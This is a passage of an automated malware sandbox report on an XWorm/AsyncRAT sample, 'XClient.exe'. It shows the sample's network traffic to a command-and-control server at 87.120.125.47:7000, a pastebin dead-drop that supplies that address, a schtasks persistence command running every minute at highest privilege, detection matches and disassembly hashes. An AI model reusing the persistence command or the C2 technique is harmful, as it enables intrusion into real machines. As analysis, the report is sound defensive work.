                    Jan 3, 2025 14:10:45.310161114 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:45.311654091 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:45.316414118 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:45.403173923 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:45.405750990 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:45.410511971 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:50.648050070 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:50.652829885 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:50.662919044 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:50.667722940 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:50.725528955 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:50.730371952 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:50.741065979 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:50.745810032 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:50.826217890 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:50.828802109 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:50.833642960 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:50.920411110 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:50.921758890 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:50.926549911 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:51.013312101 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:51.015010118 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:51.019756079 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:51.106484890 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:51.107738018 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:51.112509012 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:55.069255114 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:55.074157000 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:55.246273041 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:55.248291016 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:55.253109932 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:55.942780972 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:56.147120953 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:56.325098038 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:56.325205088 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:59.116274118 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:59.121182919 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:59.308022022 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:10:59.337165117 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:10:59.342147112 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:11:00.694281101 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:11:00.699126005 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:11:00.870752096 CET    7000     49731    87.120.125.47    192.168.2.4
                    Jan 3, 2025 14:11:00.871459961 CET    49731    7000     192.168.2.4      87.120.125.47
                    Jan 3, 2025 14:11:00.877003908 CET    7000     49731    87.120.125.47    192.168.2.4
                    Timestamp                           Source Port    Dest Port    Source IP      Dest IP
                    Jan 3, 2025 14:07:00.551600933 CET  55325          53           192.168.2.4    1.1.1.1
                    Jan 3, 2025 14:07:00.562392950 CET  53             55325        1.1.1.1        192.168.2.4
                    Timestamp                           Source IP      Dest IP      Trans ID    OP Code               Name            Type              Class          DNS over HTTPS
                    Jan 3, 2025 14:07:00.551600933 CET  192.168.2.4    1.1.1.1      0xd56d      Standard query (0)    pastebin.com    A (IP address)    IN (0x0001)    false
                    Timestamp                           Source IP      Dest IP      Trans ID    Reply Code      Name            CName    Address         Type              Class          DNS over HTTPS
                    Jan 3, 2025 14:07:00.562392950 CET  1.1.1.1        192.168.2.4  0xd56d      No error (0)    pastebin.com             172.67.19.24    A (IP address)    IN (0x0001)    false
                    Jan 3, 2025 14:07:00.562392950 CET  1.1.1.1        192.168.2.4  0xd56d      No error (0)    pastebin.com             104.20.3.235    A (IP address)    IN (0x0001)    false
                    Jan 3, 2025 14:07:00.562392950 CET  1.1.1.1        192.168.2.4  0xd56d      No error (0)    pastebin.com             104.20.4.235    A (IP address)    IN (0x0001)    false
                    • pastebin.com
                    Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
                    0             192.168.2.4    49730          172.67.19.24      443                 6884    C:\Users\user\Desktop\XClient.exe
                    Timestamp                  Bytes transferred    Direction    Data
                    2025-01-03 13:07:01 UTC    74                   OUT          GET /raw/c8qJf1m5 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2025-01-03 13:07:01 UTC    388                  IN           HTTP/1.1 200 OK
                    Date: Fri, 03 Jan 2025 13:07:01 GMT
                    Content-Type: text/plain; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    x-frame-options: DENY
                    x-content-type-options: nosniff
                    x-xss-protection: 1;mode=block
                    cache-control: public, max-age=1801
                    CF-Cache-Status: MISS
                    Last-Modified: Fri, 03 Jan 2025 13:07:01 GMT
                    Server: cloudflare
                    CF-RAY: 8fc3359c7ecb18b8-EWR
                    2025-01-03 13:07:01 UTC    24                   IN           Data Raw: 31 32 0d 0a 38 37 2e 31 32 30 2e 31 32 35 2e 34 37 3a 37 30 30 30 0d 0a
                    Data Ascii: 1287.120.125.47:7000
                    2025-01-03 13:07:01 UTC    5                    IN           Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0

                    Target ID:0
                    Start time:08:06:54
                    Start date:03/01/2025
                    Path:C:\Users\user\Desktop\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\XClient.exe"
                    Imagebase:0x210000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4114219369.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Target ID:1
                    Start time:08:06:58
                    Start date:03/01/2025
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
                    Imagebase:0x7ff76f990000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:08:06:58
                    Start date:03/01/2025
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:08:06:59
                    Start date:03/01/2025
                    Path:C:\Users\user\AppData\Roaming\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                    Imagebase:0xaa0000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Sekoia.io
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 74%, ReversingLabs
                    • Detection: 68%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    Target ID:7
                    Start time:08:08:00
                    Start date:03/01/2025
                    Path:C:\Users\user\AppData\Roaming\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                    Imagebase:0x20000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:9
                    Start time:08:09:00
                    Start date:03/01/2025
                    Path:C:\Users\user\AppData\Roaming\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                    Imagebase:0xf90000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:10
                    Start time:08:10:00
                    Start date:03/01/2025
                    Path:C:\Users\user\AppData\Roaming\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                    Imagebase:0x4d0000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true


                      Execution Graph

                      Execution Coverage:15.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:3
                      Total number of Limit Nodes:0
                      execution_graph: 3 nodes, 7ffd9b883a68 -> 7ffd9b883a71 (SetWindowsHookExW) -> 7ffd9b883b41

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph: basic blocks starting at 7ffd9b88cdf4, exit block 7ffd9b88daf1-7ffd9b88daff (rendered graph omitted)
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: ffe52e5f2479a655929fdfb20da64ce995ee1005573560dc6d11de75136cb4e2
                      • Instruction ID: aa11739422e0363d3083def3c475c0433adab0cf0a8486eca342088964888046
                      • Opcode Fuzzy Hash: ffe52e5f2479a655929fdfb20da64ce995ee1005573560dc6d11de75136cb4e2
                      • Instruction Fuzzy Hash: 01725620B1D90D4BEBA8FB6884A5A7972D2FF9C304F554579D02ED32E7DE38E8428741

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph: basic blocks starting at 7ffd9b8805b8 (rendered graph omitted)
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f1091a3df13a0a4a7615933bb4acefa3809ad35b89bf32639e52f15980538419
                      • Instruction ID: aaa06a9f5a53326c754fccaeda4ddce5b0ccd359c6a52d1e3ccff0cfdd992cfd
                      • Opcode Fuzzy Hash: f1091a3df13a0a4a7615933bb4acefa3809ad35b89bf32639e52f15980538419
                      • Instruction Fuzzy Hash: B2620861B29E094FE7A8FB6C9875679B6D2EF9C304F4505B9E01EC32DADD38A8018741

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph: basic blocks starting at 7ffd9b889566 (rendered graph omitted)
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ecf8e0c694c1ffb6754ec79f74f7a6b775c6d699c01082e3ab193f780616137e
                      • Instruction ID: 92e30c0a7313f81627621525b669462281174a6a3975323d0fb80dcb854cb07e
                      • Opcode Fuzzy Hash: ecf8e0c694c1ffb6754ec79f74f7a6b775c6d699c01082e3ab193f780616137e
                      • Instruction Fuzzy Hash: DDF1D530A09E4E8FEBA8DF68D8597E937D1FF58310F04466EE85DC7295DB3499408B82

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph: basic blocks starting at 7ffd9b88a312 (rendered graph omitted)
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eea038dee7154fe83a996e98f1d2498ba9a2c9d4ef72795975248779aa02d983
                      • Instruction ID: cddeee9447933508adc4bde2bba0099ed1f125d0876ade73fbda20aa3cb4bd14
                      • Opcode Fuzzy Hash: eea038dee7154fe83a996e98f1d2498ba9a2c9d4ef72795975248779aa02d983
                      • Instruction Fuzzy Hash: C6E1E430A09E4D8FEBA8DF68C8557E977D1FF58310F04426ED85DC72E5DA78A9408B82

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph: basic blocks starting at 7ffd9b883a68; block 7ffd9b883b02-7ffd9b883b3f calls SetWindowsHookExW (rendered graph omitted)
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID: HookWindows
                      • String ID:
                      • API String ID: 2559412058-0
                      • Opcode ID: 2175d6044e1fabf81b224838e98d95c9f498410c5805a52f98df7858fff6b2de
                      • Instruction ID: feeb6b7f23be814906d4a99e2977da148b147fc4348afcce3ba79c10c0942c38
                      • Opcode Fuzzy Hash: 2175d6044e1fabf81b224838e98d95c9f498410c5805a52f98df7858fff6b2de
                      • Instruction Fuzzy Hash: A341E730A0CE4D4FDB1CEB6C98566F9BBE1EF59321F00427EE059C3192DA75A81287C1
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 43aeb10d008f66eb15092c04babc2d5a105de5692c8ef57a111f213e9cdeb5f7
                      • Instruction ID: ee1f97d7edcd8b4fa0df03994319b840e6e2ab9664defab6baaf6c08026ec59c
                      • Opcode Fuzzy Hash: 43aeb10d008f66eb15092c04babc2d5a105de5692c8ef57a111f213e9cdeb5f7
                      • Instruction Fuzzy Hash: EA62E661B29A594FE798FB7888756B977D2FF9C300F4405B9E01DC32D7DE28A8428781
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6cb45995b91574b02903eed342a9544c00ffe163c323dd53f957003db2c1a011
                      • Instruction ID: 4f11872402b21a909e3777ecf71c759d134fb10aa2b58334775b097755468a7a
                      • Opcode Fuzzy Hash: 6cb45995b91574b02903eed342a9544c00ffe163c323dd53f957003db2c1a011
                      • Instruction Fuzzy Hash: 634118E2B095998FD34AB768FC759E87F61EF48214B8445F2D05D873CBED3825428782
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1d01f3f508d4b3f75c93edafafff6f7dcb28488229271226e2df27b1ab8d61b3
                      • Instruction ID: 92350e31320df6da92f8d6e30026adeb8003a292f3a939590199bc9c1c4b69bb
                      • Opcode Fuzzy Hash: 1d01f3f508d4b3f75c93edafafff6f7dcb28488229271226e2df27b1ab8d61b3
                      • Instruction Fuzzy Hash: 40510310B1E6C90FD756AB7848756796FD1EF8A219B0900FBE089CB1EBDD185806C342
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8a380419a7dff6102fc5e7f6650df8c7191f98788f361bfa941b154ecc969a2e
                      • Instruction ID: 45a6947c9c4f93c4e81dda8310c63c14a57256f3f10ee52cd1ad7975730d7b1f
                      • Opcode Fuzzy Hash: 8a380419a7dff6102fc5e7f6650df8c7191f98788f361bfa941b154ecc969a2e
                      • Instruction Fuzzy Hash: DF31B4E1759A894FD389EB28E4B09E9BF71EF8C201BC044A5D019C33DBDD3869018782
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f2901a624b8f7ecd92b3c0228715d2beb82d823769d2a414708d58a78d2cbcd6
                      • Instruction ID: e2e7548131699e6b9c362aef56c1bf4e4d25e8e19f66c41a989726bbd08823e3
                      • Opcode Fuzzy Hash: f2901a624b8f7ecd92b3c0228715d2beb82d823769d2a414708d58a78d2cbcd6
                      • Instruction Fuzzy Hash: DF31EA21B189490FD798FB2C987A679A2C1EF9C315F0501BEE00EC72EBDE689C018741
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 417d4731ccda7f43aba10b779d0807ce6a110deb51bfa0b8e1883f2be18cb688
                      • Instruction ID: b43a77422da57a4e7fd747e2456d0bea92e6a77c51bf74768cd7a1375c0de978
                      • Opcode Fuzzy Hash: 417d4731ccda7f43aba10b779d0807ce6a110deb51bfa0b8e1883f2be18cb688
                      • Instruction Fuzzy Hash: 2841C370A18A594FDB49EB78D861AED7BB1FF88300F9005B5D009D33D6DE38A801C781
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
                      • Instruction ID: 7803e422d1136a6b6b5d3c874e7e2f1abf1f0e2d43eb12486e7901e2174a0cad
                      • Opcode Fuzzy Hash: 50b5c4e98baf6e341638edda66431d42c9b168119fbcb42eeb334a33a1f350b2
                      • Instruction Fuzzy Hash: 74215A21F149194BEB58BBBC586A7FC72D2FF9C715F100176E01DC32DADD1868424791
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 457c96d93915e53c0993e45d39756a15bd39a632904e065f926e272037147606
                      • Instruction ID: e2c1afba78aae1eeecd4071edddba1da76b646a8c8fbf902b3c6338282df8648
                      • Opcode Fuzzy Hash: 457c96d93915e53c0993e45d39756a15bd39a632904e065f926e272037147606
                      • Instruction Fuzzy Hash: D4016D52B1EAA90FF751737878215727FE0DF9A261B4905B7F888CA1A7E8085A4143D2
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dada08eed77c929611449963c8fe238b614173b4f504e970fb0b04b50caac592
                      • Instruction ID: 9c635304fa9f536ebae9f4d166cafbb72c8471d053cbbf6010834de7fc7448af
                      • Opcode Fuzzy Hash: dada08eed77c929611449963c8fe238b614173b4f504e970fb0b04b50caac592
                      • Instruction Fuzzy Hash: D162EB61B1DA494FEB58FB7C947A6BDB7D2EF98300F4405B9E05DC32DADD28A8428341
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a441b137bed92704be88a2ecd4bcae9d3cb2c529e0b5fd434512fbf4e0563cf8
                      • Instruction ID: 08e46f1d9f350818ad1966a6d3f45b2aca67388d3cb7ba2f8a02a448296de20a
                      • Opcode Fuzzy Hash: a441b137bed92704be88a2ecd4bcae9d3cb2c529e0b5fd434512fbf4e0563cf8
                      • Instruction Fuzzy Hash: D641E362B0D5598BD709BB68BC7A8ECBF61EF54214B8441F2D45D872CFED3824468782
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ae5d1719c8dfefd8f8b47f3ac489e0f48c0e36f4f247a478b91140b92590e98b
                      • Instruction ID: c4af62a873dd3ca7d91dabbc8d9c9f2cdedf7c5130ca0a1886fb3ea24a3338cf
                      • Opcode Fuzzy Hash: ae5d1719c8dfefd8f8b47f3ac489e0f48c0e36f4f247a478b91140b92590e98b
                      • Instruction Fuzzy Hash: 68510120B1E6C90FDB96AB7C48756796FD1DF8A219B0901FBE099C71EBDE185806C342
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a4acc0945755c0c84b7c858afcc836cb53ad86e09e6d2f0b938731e1bde2f04a
                      • Instruction ID: 81ccf82b6b92fcb977a95ed97545442a38a96e09e1621485c0a5c51756a51ac2
                      • Opcode Fuzzy Hash: a4acc0945755c0c84b7c858afcc836cb53ad86e09e6d2f0b938731e1bde2f04a
                      • Instruction Fuzzy Hash: 9031946175DA894FD348EB28A4B68BDBFB1FFA8200BC045A5D419C33DEDD3469098752
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b7825b186defd27461806548f5b9e70a4fdc26c09c56b253820766bf99d6c553
                      • Instruction ID: f8f6d651b5bce7f33e8898340aa53565545034b5d4d7869aa7c4d98d5b8a3ccc
                      • Opcode Fuzzy Hash: b7825b186defd27461806548f5b9e70a4fdc26c09c56b253820766bf99d6c553
                      • Instruction Fuzzy Hash: 1131CA21B1C9490FEB98FB2C587A679A6C1EF9C355F0505BEE05EC32EBDE685C418341
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0b19b07829332da02dfc6e782edbf1d8cb81e4b222e67d954a935f704a0f192d
                      • Instruction ID: 301d0322136a7bd89bc80b858811f044dcf93d5c5ad7e766299f447d38b23387
                      • Opcode Fuzzy Hash: 0b19b07829332da02dfc6e782edbf1d8cb81e4b222e67d954a935f704a0f192d
                      • Instruction Fuzzy Hash: 6F419431A18A4D4FDB48EB68D8656EDBBB1FF99300F5105B9D019D32DADE38A805C741
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d46d89a385447af755cc829978e1d0872fd09819bfb657b38a39e342e0b37982
                      • Instruction ID: 8f797c8f4f07b99bbb34ea0e9846bedf703815ee3f59d788942a4f86c31a1698
                      • Opcode Fuzzy Hash: d46d89a385447af755cc829978e1d0872fd09819bfb657b38a39e342e0b37982
                      • Instruction Fuzzy Hash: D1215761F14D098BEB48BBBC586A7BC72D2FF98715F10017AE11DC32DADD28A8424341
                      Memory Dump Source
                      • Source File: 00000007.00000002.2357450182.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_7_2_7ffd9b890000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3b3c869c5b6584b53b27e54bd8bdc135bed9cd367ee73050fe225b4f5b36688a
                      • Instruction ID: bcbbf097d8ea008e8f5c36bf88eb3b9b81fe3dce83a4845b82835f46f01c4fd0
                      • Opcode Fuzzy Hash: 3b3c869c5b6584b53b27e54bd8bdc135bed9cd367ee73050fe225b4f5b36688a
                      • Instruction Fuzzy Hash: 08016D16B0E6991FFB51776878215757FE0CBD6260B4905B7F8C9C60A7E8085A414392
                      Memory Dump Source
                      • Source File: 00000009.00000002.2957620656.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 805424396a6afc70c99d55ba5bd9e1f2b97e42606811afb77eff3629c80baf8e
                      • Instruction ID: 5d939faf02616f50a4d2be35351488f8993b73ef3a5388da496a1d4511e49000
                      • Opcode Fuzzy Hash: 805424396a6afc70c99d55ba5bd9e1f2b97e42606811afb77eff3629c80baf8e
